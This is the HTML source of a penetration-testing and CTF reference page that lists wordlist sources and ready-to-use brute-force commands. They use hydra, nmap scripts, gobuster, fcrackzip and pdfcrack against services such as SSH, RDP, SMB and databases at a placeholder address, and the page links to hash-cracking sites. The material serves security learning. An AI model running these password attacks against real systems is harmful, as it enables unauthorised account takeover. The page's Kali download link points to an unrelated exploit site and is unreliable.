<!DOCTYPE html>
<html>
<head>
<title>CST</title>
<link rel="icon" href="icon.ico">
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Cyber">
<meta name="keywords" content="Hacking, Penetration Test, Vulnerability Assessment, Cyber, CTF, CST">
<style>
body {
  font-family: "Lato", sans-serif;
  background-color: #191919;
  color: #f1f1f1;
  background-image: url('bg.jpg');
  background-repeat: no-repeat;
  background-attachment: fixed;
  background-size: cover;
}

.sidenav {
  height: 100%;
  width: 0;
  position: fixed;
  z-index: 1;
  top: 0;
  left: 0;
  background-color: #202124;
  background-image: url('bg.jpg');
  overflow-x: hidden;
  transition: 0s;
  padding-top: 20px;
}

.sidenav a {
  padding: 1px 1px 1px 12px;
  text-decoration: none;
  font-size: 14px;
  color: #818181;
  display: block;
  transition: 0s;
}

.sidenav a:hover {
  color: #f1f1f1;
}

.sidenav .closebtn {
  position: absolute;
  top: 0;
  right: 25px;
  font-size: 36px;
  margin-left: 50px;
}

.main {
  margin-left: 160px; 
  font-size: 20px; 
  padding: 0px 10px;
}

.text.center {
	text-align: center;
}

.bottomright {
  position: fixed;
  bottom: 0;
  right: 0;
  color: white;
  padding: 10px 10px;
  font-size: 30px; 
}

@media screen and (max-height: 450px) {
  .sidenav {padding-top: 15px;}
  .sidenav a {font-size: 12px;}
}

hr { 
	display: block; 
	height: 1px;
    border: 0; 
    border-top: 1px solid black;
    margin: 1em 0; 
    padding: 0; 
}

#rcorners {
  border-radius: 15px;
  background: #2e2d2e;
  padding: 10px; 
  width: 80%;
  height: auto;  
  word-wrap: break-word;
}

#divtitle {
  height: auto;
  width: 50%;
}

div.trans {
  opacity: 0.6;
}

/*
div {
  border: double;
}
*/

</style>
</head>
<body>
<a name="top"></a>
<div id="mySidenav" class="sidenav">
  <a href="javascript:void(0)" class="closebtn" onclick="closeNav()">&times;</a>
  <a href="index.html"><b>Home</a>
  <hr>
  <a href="nmap.html">Nmap</a>
  <hr>
  <a href="exploit.html">Search for exploits</a>
  <hr>
  <a href="brutef.html">Brute Force</a>
  <hr>
  <a href="hex.html">Hex and Headers</a>
  <hr>
  <a href="wrevshell.html">Windows Reverse Shells</a>
  <hr>
  <a href="lrevshell.html">Linux Reverse Shells</a>
  <hr>
  <a href="pel.html">Linux Penetration</a>
  <hr>
  <a href="pew.html">Windows Penetration</a>
  <hr>
  <a href="ctf.html">Mini-CTF</a>
  <hr>
  <a href="contact.html">Contact</b></a>
  <hr>
  <hr>
</div>

<div id="main">
  <span style="font-size:30px;cursor:pointer" onclick="openNav()">&#9776;</span>
</div>

<center><div id="divtitle">
<img src="logox.png" height=100px></img>
<br>
<br>
<br>
</div></center>

<center><div id="rcorners" class="trans">
  <h3>BRUTE FORCE YOUR WAY IN</h3>
    <img src="search.png" width=200px>
  <p>Below are some good sources for wordlists and brute force tool examples</p>
  <hr>
  <h4 style="text-align: left">Kali Linux!</h4>
   <p style="text-align: left">You can get Kali Linux from <a href="https://exploits.shodan.io/welcome" style="text-decoration: none; color: white"><b>here</b>.</a> Kali contains a number of toolsets ready to use and a large number of wordlists which can be found in the following directory:</p>
  <p style="text-align: left">/usr/share/wordlists/</p>
 
  <hr>
  <h4 style="text-align: left">Crack Station Wordlists</h4>
  <p style="text-align: left"><a href="https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm" style="text-decoration: none; color: white">LINK</b></a></p>
  <hr>
  <h4 style="text-align: left">Dormidera Wordlists</h4>
  <p style="text-align: left"><a href="https://github.com/Dormidera/WordList-Compendium" style="text-decoration: none; color: white">LINK</b></a></p>
  <hr>
  <h4 style="text-align: left">FTP brute force example</h4>
  <p style="text-align: left">hydra -l root -P passwords.txt [-t 32] 10.0.0.1 ftp</p>
  <hr>
   <h4 style="text-align: left">HTTP Basic Auth brute force example</h4>
  <p style="text-align: left">hydra -L /path/to/users.txt -P /path/to/password.txt 10.0.0.1 http-get /</p>
  <hr>
  <h4 style="text-align: left">Gobuster brute forcing URIs</h4>
  <p style="text-align: left">gobuster -v -u https://wesitename -w /path/to/dictionary</p>
  <p style="text-align: left">Kali has good dictionaries in /usr/share/wordlists/</p>
  <hr>
  <h4 style="text-align: left">Dirbuster GUI brute forcing URIs</h4>
  <p style="text-align: left">To get a GUI version of gobuster use the command:</p>
  <p style="text-align: left">root@kali:~# dirbuster</p>
  <hr> 
  <h4 style="text-align: left">IRC brute force example</h4>
  <p style="text-align: left">nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/to/userlist.txt,passdb=/path/to/passwordlist.txt -p PORT 10.0.0.1</p>
  <hr>
  <h4 style="text-align: left">LDAP brute force example</h4>
  <p style="text-align: left">nmap --script ldap-brute -p 389 10.0.0.1</p>
  <hr>
  <h4 style="text-align: left">MySQL brute force example</h4>
  <p style="text-align: left">hydra -L users.txt -P passwords.txt 10.0.0.1 mysql</p>
  <hr>
  <h4 style="text-align: left">POP3 brute force example</h4>
  <p style="text-align: left">hydra -l username -P /path/to/passwords.txt -f 10.0.0.1 pop3 -V</p>
  <hr>
  <h4 style="text-align: left">PostgreSQL brute force example</h4>
  <p style="text-align: left">hydra -L /path/to/user.txt –P /path/to/passwords.txt 10.0.0.1 postgres</p>
  <hr> 
  <h4 style="text-align: left">RDP brute force example</h4>
  <p style="text-align: left">hydra -V -f -L users.txt -P passwords.txt rdp://10.0.0.1</p>
  <hr>
  <h4 style="text-align: left">Redis brute force example</h4>
  <p style="text-align: left">hydra –P /path/to/passwords.txt 10.0.0.1 redis</p>
  <hr> 
  <h4 style="text-align: left">Rlogin brute force example</h4>
  <p style="text-align: left">hydra -l username -P /path/to/passwords.txt rlogin://10.0.0.1 -v -V</p>
  <hr> 
  <h4 style="text-align: left">RTSP brute force example</h4>
  <p style="text-align: left">hydra -l root -P passwords.txt 10.0.0.1 rtsp</p>
  <hr>
  <h4 style="text-align: left">SNMP brute force example</h4>
  <p style="text-align: left"> hydra -P /path/to/community-strings.txt 10.0.0.1 snmp </p>
  <hr>
  <h4 style="text-align: left">SMB brute force example</h4>
  <p style="text-align: left"> hydra -l Administrator -P passwords.txt 10.0.0.1 smb -t 1</p>
  <hr>
  <h4 style="text-align: left">SMTP brute force example</h4>
  <p style="text-align: left"> hydra -l username -P /path/to/passwords.txt 10.0.0.1 smtp -V</p>
  <hr>
  <h4 style="text-align: left">SMTP SSL brute force example</h4>
  <p style="text-align: left"> hydra -l username -P /path/to/passwords.txt -s 587 10.0.0.1 -S -v -V</p>
  <hr>
  <h4 style="text-align: left">SQL brute force example</h4>
  <p style="text-align: left">hydra -L /path/to/users.txt –P /path/to/passwords.txt 10.0.0.1 mssql</p>
  <hr>
  <h4 style="text-align: left">SSH brute force example</h4>
  <p style="text-align: left">hydra -l root -P passwords.txt [-t 32] 10.0.0.1 ssh</p>
  <hr>
  <h4 style="text-align: left">TELNET brute force example</h4>
  <p style="text-align: left">hydra -l root -P passwords.txt [-t 32] 10.0.0.1 telnet</p>
  <hr>  
  <h4 style="text-align: left">VNC brute force example</h4>
  <p style="text-align: left">hydra -L /path/to/users.txt –P /path/to/passwords.txt -s PORT 10.0.0.1 vnc</p>
  <hr>    
  <h4 style="text-align: left">ZIP brute force example</h4>
  <p style="text-align: left">fcrackzip -u -v -D -p '/path/to/passwords.txt' passwordprotected.zip</p>
  <hr> 
  <h4 style="text-align: left">PDF brute force example</h4>
  <p style="text-align: left">pdfcrack passwordprotected.pdf -w /path/to/passwords.txt</p>
  <hr>  
  <h4 style="text-align: left">Online cracking links</h4>
  
  <p style="text-align: left"><a href="https://www.cmd5.org/" style="text-decoration: none; color: white">https://www.cmd5.org/</b></a></p>
  <p style="text-align: left"><a href="https://crackstation.net/" style="text-decoration: none; color: white">https://crackstation.net/</b></a></p>
  <p style="text-align: left"><a href="https://hashtoolkit.com/" style="text-decoration: none; color: white">https://hashtoolkit.com/</b></a></p>
  <p style="text-align: left"><a href="https://www.onlinehashcrack.com/" style="text-decoration: none; color: white">https://www.onlinehashcrack.com/</b></a></p>
  <p style="text-align: left"><a href="https://md5decrypt.net/" style="text-decoration: none; color: white">https://md5decrypt.net/</b></a></p>
  <p style="text-align: left"><a href="https://gpuhash.me/" style="text-decoration: none; color: white">https://gpuhash.me/</b></a></p>
  <hr>  
</div></center>

<a class="bottomright" href="#top" style="text-decoration: none; color: white;"><b>&#8682;</b></a>
  
<script>
function openNav() {
  document.getElementById("mySidenav").style.width = "250px";
}

function closeNav() {
  document.getElementById("mySidenav").style.width = "0";
}
</script>

</body>
</html> 
